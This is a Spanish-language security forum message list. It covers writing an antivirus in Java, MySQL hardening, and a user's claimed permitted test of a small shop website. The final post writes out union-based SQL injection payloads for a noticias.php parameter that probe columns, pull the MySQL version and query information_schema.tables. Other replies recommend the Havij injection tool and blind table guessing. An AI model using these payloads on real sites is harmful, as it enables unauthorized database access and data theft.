Mensajes

Jeje no esta mal, podrias pasarlo a PDF y haces un mini-how to sobre cracking wep.

Saludos

¿Un antivirus en Java? Se puede, pero seria casi inútil.

Por consecuencia, ya no seri un Antivirus jeje, java tiene que evolucionar en ciertos aspectos para lograr esas cosas.
Siempre puedes liarte a hacer implementaciones en C con JNI.

Saludos

Muy buenos y completos, se agradece muchisimo

Saludos

gracias por tu respuesta ,me podrias explicar mas o menos en que consiste lo de heuristica si se que son tecnicas para deteccion de virus pero cual seria el problema con JAVA,he estado leyendo y he ncontrado que desde java no Te deja acceder a la maquina virtual tener control total,y lei que en visual basic que no se recomienda por que ocupa  muchas librerias ajenas,que el mejor es mezclar C++ y tal vez ASM lenguaje ensamblador... que me dicess..espero tu respuestaa.saludos XD

Exactamente lo que te comentaba, heurística significa a grandes rasgos, detectar leyendo la memoria del proceso o ejecutable que funciones usa y si son dañinas, como las aplica, si hay conexión remota sin autorización, y eso lo suyo es hacerlo en C, en ASM si te quieres romper el coco un poco adelante, pero yo te recomiendo C.

Saludos

Pues mira, sinceramente no creo que Java sea la mejor opción, primero porque tu antivirus no podrá analizar virus a nivel heurístico, pues no podrás atacchearte al proceso malicioso y analizarlo.

Y segundo por el control malo, que tiene sobre el sistema.

Tu antivirus se limitaria a analisis de scripts y por bases de datos de firmas de software.

Saludos

la práctica de actualizar el software es FUNDAMENTAL, el hecho es que con más funcionalidad vienen más peligros.

el acceso a information_schema NUNCA debería ser posible desde un usuario creado para una web, de hecho solo debería poder acceder a la tabla para la cual ha sido creado, separando la de login, y sobre todo SOLO selects, nada de updates blablablá


te recomiendo usar "Havij" es un programa muy útil, te comprueba automáticamente la existencia de ciertas tablas, viene con su propio diccionario y peude ser aumentado facilmente.


así mismo para todos:

http://www.securitybydefault.com/2010/08/fortificacion-de-mysql-13.html
http://www.securitybydefault.com/2010/08/fortificacion-de-mysql-23.html

Muchas gracias por la información

Saludos

Muchisimas gracias

Saludos

No si ya lo dicen los expertos, hay que tener todo actualizado... que si no las cosas se hacen mas dificiles... 
Alguien podria decirme si es factible bruteforce o alguna lista de defaults?

Saludos

information_schema.tables no esta en la version 4 tendras que hacerlo a ciegas XD

Osea que pruebe nombres de tablas a lo loco?

Saludos

Buenas a todos, estoy auditando un sistema web casera de la tienda de mi tio, me dijo que lo podia usar para hacer pruebas si no modificaba nada 
La cuestión es que encontré varias fallas SQLi, y ahora quiero simular la explotación o por lo menos obtener datos interesantes, primero comprové que la variable ID era vulnerable:

Código [Seleccionar] Expandir

noticias.php?id='1
Y devolvió error!

Luego me aseguré de ver que tablas eran vulnerables y en la numero 7 pude observar que me devolvia 2,4,5

Código [Seleccionar] Expandir

noticias.php?id=-1+union+select+1,2,3,4,5,6,7--
Así que procedí a obtener la information_schema, pero antes comprobar la versión:

Código [Seleccionar] Expandir

noticias.php?id=id=-1+union+select+1,@@version,3,4,5,6,7--
Y me deolvió:
4.0.27-max-log

Y según se, este mysql no trae information_schema , cierto? Ya me confirmarán.
Ahora viene el problema, intento obtener tablas de information_schema:

Código [Seleccionar] Expandir

noticias.php?id=-1+union+select+1,group_concat(table_name),3,4,5,6,7+from+information_schema.tables--
Pero tan solo obtengo:

Error : You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '(table_name),3,4,5,6,7 from information_schema.tables--' at lin

Que estoy haciendo mal? Juraria que la querie esta bien formulada pero no soy muy dado a los SQLi :S

Saludos